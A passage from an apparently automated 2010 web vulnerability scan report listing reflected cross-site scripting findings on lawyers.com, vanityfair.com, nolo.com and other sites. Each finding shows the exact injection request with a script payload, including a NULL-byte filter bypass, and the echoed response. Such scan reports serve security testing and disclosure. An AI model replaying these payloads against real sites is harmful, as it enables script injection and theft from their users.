Path:   /Massachusetts/Divorce-in-Massachusetts.html/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be6b0"><script>alert(1)</script>282e81ac04f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Massachusetts/Divorce-in-Massachusetts.html/x22?be6b0"><script>alert(1)</script>282e81ac04f=1 HTTP/1.1
Host: research.lawyers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:36 GMT
Server: www.lawyers.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 92660
X-RE-Ref: 1 947343742
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
Set-Cookie: PageHistory=; domain=.lawyers.com; path=/
Set-Cookie: quovaresult=us|dallas|tx; domain=.lawyers.com; expires=Mon, 28-Feb-2011 17:15:37 GMT; path=/
Set-Cookie: year=dXNlcklkPTE4NzkzNTY2NzY=; domain=.lawyers.com; expires=Tue, 29-Nov-2011 17:15:37 GMT; path=/
Set-Cookie: hour=c2Vzc2lvbklkPTIwMTEzOTQwNzY=; domain=.lawyers.com; expires=Mon, 29-Nov-2010 18:15:37 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="head"><title>
   Divorce in Massachusetts (MA) - Lawyer
...[SNIP]...
<form name="inputForm" method="POST" action="/default.aspx?be6b0"><script>alert(1)</script>282e81ac04f=1&sc_itemid={2FB51482-C6E8-48CD-A139-F5BF82D6124B}" id="inputForm">
...[SNIP]...

1.87. http://research.lawyers.com/Massachusetts/Massachusetts-Lawyers-Laws-and-Resources.html/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://research.lawyers.com
Path:   /Massachusetts/Massachusetts-Lawyers-Laws-and-Resources.html/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80dbb"><script>alert(1)</script>829859abfe2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Massachusetts/80dbb"><script>alert(1)</script>829859abfe2/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dX6LzTPDsK4T7lwfX0JTTDA\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CCgQ6QUoAA\\x26amp;q\\x3dmassachusetts+divorce\\x26amp;usg\\x3dAFQjCNHl-UvWRLQMrvEtCe7ezrKTXtNYiw\\x22\\x3eMassachusetts\\x3c/a\\x3e\\x3c/span\\x3e\\x3c/cite\\x3e HTTP/1.1
Host: research.lawyers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:35 GMT
Server: www.lawyers.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 130018
X-RE-Ref: 1 946154444
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
Set-Cookie: PageHistory=; domain=.lawyers.com; path=/
Set-Cookie: quovaresult=us|dallas|tx; domain=.lawyers.com; expires=Mon, 28-Feb-2011 17:15:35 GMT; path=/
Set-Cookie: year=dXNlcklkPTE4NzkzNTY2NjQ=; domain=.lawyers.com; expires=Tue, 29-Nov-2011 17:15:35 GMT; path=/
Set-Cookie: hour=c2Vzc2lvbklkPTIwMTEzOTQwNjQ=; domain=.lawyers.com; expires=Mon, 29-Nov-2010 18:15:35 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="head"><title>
   research Attorney, Lawyer, Attorneys,
...[SNIP]...
<form name="inputForm" method="POST" action="/default.aspx?aspxerrorpath=/Massachusetts/80dbb"><script>alert(1)</script>829859abfe2/x26amp;rct/x3dj/x26amp;sa/x3dX/x26amp;ei/x3dX6LzTPDsK4T7lwfX0JTTDA/x26amp;sqi/x3d2/x26amp;ved/x3d0CCgQ6QUoAA/x26amp;q/x3dmassachusetts divorce/x26amp;usg/x3dAFQjCNHl-UvWRLQMrvEtCe7ezrKTXtNYiw/x22/x3eM
...[SNIP]...

1.88. http://research.lawyers.com/glossary/search.html [term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://research.lawyers.com
Path:   /glossary/search.html

Issue detail

The value of the term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3acb8"><script>alert(1)</script>c80aadc5560 was submitted in the term parameter. This input was echoed as 3acb8\"><script>alert(1)</script>c80aadc5560 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /glossary/search.html?term=asset3acb8"><script>alert(1)</script>c80aadc5560&x=0&y=0 HTTP/1.1
Host: research.lawyers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:45 GMT
Server: LexisNexis
Vary: X-Forwarded-Host
Accept-Ranges: bytes
X-Powered-By: PHP/4.4.3
Content-Type: text/html; charset=UTF-8
Set-Cookie: year=deleted; expires=Sun, 29 Nov 2009 17:15:45 GMT; path=/; domain=.lawyers.com
Set-Cookie: month=deleted; expires=Sun, 29 Nov 2009 17:15:45 GMT; path=/; domain=.lawyers.com
Set-Cookie: hour=deleted; expires=Sun, 29 Nov 2009 17:15:45 GMT; path=/; domain=.lawyers.com
Set-Cookie: minute=deleted; expires=Sun, 29 Nov 2009 17:15:45 GMT; path=/; domain=.lawyers.com
Set-Cookie: session=deleted; expires=Sun, 29 Nov 2009 17:15:45 GMT; path=/; domain=.lawyers.com
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
                   <title>Asset3acb8\"><
...[SNIP]...
<meta name="description" content="Your search for asset3acb8\"><script>alert(1)</script>c80aadc5560 found 0 legal terms.">
...[SNIP]...

1.89. http://research.lawyers.com/glossary/search.html [term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://research.lawyers.com
Path:   /glossary/search.html

Issue detail

The value of the term request parameter is copied into the HTML document as text between TITLE tags. The payload e121c</title><script>alert(1)</script>ab02bf8558d was submitted in the term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /glossary/search.html?term=assete121c</title><script>alert(1)</script>ab02bf8558d&x=0&y=0 HTTP/1.1
Host: research.lawyers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:50 GMT
Server: LexisNexis
Vary: X-Forwarded-Host
Accept-Ranges: bytes
X-Powered-By: PHP/4.4.3
Content-Type: text/html; charset=UTF-8
Set-Cookie: year=deleted; expires=Sun, 29 Nov 2009 17:15:49 GMT; path=/; domain=.lawyers.com
Set-Cookie: month=deleted; expires=Sun, 29 Nov 2009 17:15:49 GMT; path=/; domain=.lawyers.com
Set-Cookie: hour=deleted; expires=Sun, 29 Nov 2009 17:15:49 GMT; path=/; domain=.lawyers.com
Set-Cookie: minute=deleted; expires=Sun, 29 Nov 2009 17:15:49 GMT; path=/; domain=.lawyers.com
Set-Cookie: session=deleted; expires=Sun, 29 Nov 2009 17:15:49 GMT; path=/; domain=.lawyers.com
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
                   <title>Assete121c</title><script>alert(1)</script>ab02bf8558d Returned the Following Results - Lawyers.com</title>
...[SNIP]...

1.90. http://research.lawyers.com/glossary/search.html [term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://research.lawyers.com
Path:   /glossary/search.html

Issue detail

The value of the term request parameter is copied into the HTML document as plain text between tags. The payload 95d68<script>alert(1)</script>f09d2303893 was submitted in the term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /glossary/search.html?term=asset95d68<script>alert(1)</script>f09d2303893&x=0&y=0 HTTP/1.1
Host: research.lawyers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:47 GMT
Server: LexisNexis
Vary: X-Forwarded-Host
Accept-Ranges: bytes
X-Powered-By: PHP/4.4.3
Content-Type: text/html; charset=UTF-8
Set-Cookie: year=deleted; expires=Sun, 29 Nov 2009 17:15:46 GMT; path=/; domain=.lawyers.com
Set-Cookie: month=deleted; expires=Sun, 29 Nov 2009 17:15:46 GMT; path=/; domain=.lawyers.com
Set-Cookie: hour=deleted; expires=Sun, 29 Nov 2009 17:15:46 GMT; path=/; domain=.lawyers.com
Set-Cookie: minute=deleted; expires=Sun, 29 Nov 2009 17:15:46 GMT; path=/; domain=.lawyers.com
Set-Cookie: session=deleted; expires=Sun, 29 Nov 2009 17:15:46 GMT; path=/; domain=.lawyers.com
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
                   <title>Asset95d68<scr
...[SNIP]...
<h1>Asset95d68<script>alert(1)</script>f09d2303893 - 0 Legal Terms</h1>
...[SNIP]...

1.91. http://result.vanityfair.com/spring/event/most.go [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://result.vanityfair.com
Path:   /spring/event/most.go

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 15fa3<script>alert(1)</script>4cae3a07bf6 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /spring/event/most.go?callback=jsonp129105174756615fa3<script>alert(1)</script>4cae3a07bf6&_=1291051748601&env=PROD&site=VYF&type=all&event=most_emailed&num=5&day=2 HTTP/1.1
Host: result.vanityfair.com
Proxy-Connection: keep-alive
Referer: http://www.vanityfair.com/services/privacypolicy
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_campaign%3D%7C1291053548489%3B%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20sinvisit_m%3Dtrue%7C1291053548494%3B%20s_nr%3D1291051748509%7C1293643748509%3B%20s_eVar10%3D%7C1291053548515%3B%20s_depth%3D1%7C1291053548518%3B%20gpv_p5%3Dno%2520value%7C1291053548530%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=122134540.197414222.1291051749.1291051749.1291051749.1; __utmc=122134540; __utmb=122134540.1.10.1291051749

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 29 Nov 2010 16:59:31 GMT
Content-Length: 1309
Connection: close

jsonp129105174756615fa3<script>alert(1)</script>4cae3a07bf6([{"rank":1,"contentId":"culture/features/2010/12/vanishing-blonde-201012","contentTitle":"The Case of the Vanishing Blonde","contentUrl":"http://www.vanityfair.com/culture/features/2010/12/vanishing-b
...[SNIP]...

1.92. http://search.nolo.com/query.html [qt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.nolo.com
Path:   /query.html

Issue detail

The value of the qt request parameter is copied into the HTML document as plain text between tags. The payload %0022c28<script>alert(1)</script>079b7191186 was submitted in the qt parameter. This input was echoed as 22c28<script>alert(1)</script>079b7191186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /query.html?col=glossary&qt=arrest%0022c28<script>alert(1)</script>079b7191186&submit.x=22&submit.y=11&submit=search HTTP/1.1
Host: search.nolo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Ultraseek/5.3.4
Cache-control: public
Expires: Mon, 29 Nov 2010 17:16:48 GMT
Date: Mon, 29 Nov 2010 17:15:48 GMT
Content-type: text/html; charset=iso-8859-1
Content-length: 10701
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 4.01 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
<strong class="searchTerm">arrest.22c28<script>alert(1)</script>079b7191186</strong>
...[SNIP]...

1.93. https://secure.vanityfair.com/services/newsletters [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.vanityfair.com
Path:   /services/newsletters

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3c44"><script>alert(1)</script>c5b05c645d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/newsletters?e3c44"><script>alert(1)</script>c5b05c645d1=1 HTTP/1.1
Host: secure.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:55 GMT
Server: Resin/3.1.6
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=adbve7ezOmNCr6EgJOyYs.1; domain=.vanityfair.com; path=/
Connection: close
Content-Length: 78507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/services/newsletters?printable=true&e3c44"><script>alert(1)</script>c5b05c645d1=1" title="Print this page">
...[SNIP]...

1.94. http://sitelife.vanityfair.com/ver1.0/Direct/Jsonp [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.vanityfair.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 4f58c<script>alert(1)</script>ef1e1c23d1d was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22DiscoverContentAction%22%3A%7B%22Activity%22%3A%7B%22Activity%22%3A%7B%22Name%22%3A%22Commented%22%7D%7D%2C%22Age%22%3A2%2C%22ContentType%22%3A%7B%22ContentType%22%3A%7B%22Name%22%3A%22Article%22%7D%7D%2C%22LimitToContributors%22%3A%5B%7B%22UserTier%22%3A%7B%22Name%22%3A%22All%22%7D%7D%5D%2C%22MaximumNumberOfDiscoveries%22%3A5%2C%22SearchCategories%22%3A%5B%7B%22Category%22%3A%7B%22Name%22%3A%22ALL%22%7D%7D%5D%2C%22SearchSections%22%3A%5B%7B%22Section%22%3A%7B%22Name%22%3A%22ALL%22%7D%7D%5D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback04f58c<script>alert(1)</script>ef1e1c23d1d HTTP/1.1
Host: sitelife.vanityfair.com
Proxy-Connection: keep-alive
Referer: http://www.vanityfair.com/services/privacypolicy
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_campaign%3D%7C1291053548489%3B%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20sinvisit_m%3Dtrue%7C1291053548494%3B%20s_nr%3D1291051748509%7C1293643748509%3B%20s_eVar10%3D%7C1291053548515%3B%20s_depth%3D1%7C1291053548518%3B%20gpv_p5%3Dno%2520value%7C1291053548530%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=122134540.197414222.1291051749.1291051749.1291051749.1; __utmc=122134540; __utmb=122134540.1.10.1291051749

Response

HTTP/1.1 200 OK
Set-Cookie: plckARPT-luckymagprod=R3792871957; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 5282
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm204l3pluckcom
Set-Cookie: ASP.NET_SessionId=eqbskv55nksx31553w20tyyj; path=/; HttpOnly
Set-Cookie: SiteLifeHost=l3vm204l3pluckcom; domain=vanityfair.com; path=/
Set-Cookie: anonId=66de4b33-9a2f-418d-966f-5e242b423d2f; domain=vanityfair.com; expires=Tue, 29-Nov-2011 17:01:44 GMT; path=/
Date: Mon, 29 Nov 2010 17:01:44 GMT

RequestBatch.callbacks.daapiCallback04f58c<script>alert(1)</script>ef1e1c23d1d({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"11/29/2010 12:01:44:926 PM"}],"Responses":[{"DiscoverContentAction":{"SearchSections":[{"Name":"all"}],"SearchCategories":[{"Name":"all"}],
...[SNIP]...

1.95. http://vermont.uscity.net/Anger_Management/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vermont.uscity.net
Path:   /Anger_Management/x22

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84c5a<script>alert(1)</script>10c612df716 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Anger_Management84c5a<script>alert(1)</script>10c612df716/x22 HTTP/1.1
Host: vermont.uscity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 29 Nov 2010 17:16:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7270

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>403 Forbidden</TITLE>
<META content="403 Forbidden" name=description>
<META content=TRUE name=MSSmartTagsPreventParsing>

<link re
...[SNIP]...
<br>

Requested File: http://vermont.uscity.net/Anger_Management84c5a<script>alert(1)</script>10c612df716/x22 <br>
...[SNIP]...

1.96. http://vermont.uscity.net/Anger_Management/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vermont.uscity.net
Path:   /Anger_Management/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84dcc<script>alert(1)</script>47fad8a2dba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Anger_Management/x2284dcc<script>alert(1)</script>47fad8a2dba HTTP/1.1
Host: vermont.uscity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 29 Nov 2010 17:16:06 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7270

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>403 Forbidden</TITLE>
<META content="403 Forbidden" name=description>
<META content=TRUE name=MSSmartTagsPreventParsing>

<link re
...[SNIP]...
<br>

Requested File: http://vermont.uscity.net/Anger_Management/x2284dcc<script>alert(1)</script>47fad8a2dba <br>
...[SNIP]...

1.97. http://vermont.uscity.net/Anger_Management/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vermont.uscity.net
Path:   /Anger_Management/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a07fa<script>alert(1)</script>c404752f083 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Anger_Management/x22?a07fa<script>alert(1)</script>c404752f083=1 HTTP/1.1
Host: vermont.uscity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 29 Nov 2010 17:16:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7273

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>403 Forbidden</TITLE>
<META content="403 Forbidden" name=description>
<META content=TRUE name=MSSmartTagsPreventParsing>

<link re
...[SNIP]...
<br>

Requested File: http://vermont.uscity.net/Anger_Management/x22?a07fa<script>alert(1)</script>c404752f083=1 <br>
...[SNIP]...

1.98. http://redcated/COM/iview/245726341/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /COM/iview/245726341/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83da1'%3bb72e7fd243b was submitted in the REST URL parameter 4. This input was echoed as 83da1';b72e7fd243b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /COM/iview/245726341/direct83da1'%3bb72e7fd243b;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 11052
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 29 Nov 2010 17:01:20 GMT

<html><head><title>refurb_free_300x250_111710</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCIN/refurb_free_111710/refurb_free_300x250_111710.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/245726341/direct83da1';b72e7fd243b;wi.300;hi.250;ai.191305088;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/245726341/direct83da1';b72e7fd243b;wi.300;hi.250;ai.191305088;ct.1/01" />
...[SNIP]...

1.99. http://redcated/COM/iview/245726341/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /COM/iview/245726341/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ed5"><script>alert(1)</script>6b38c822330 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

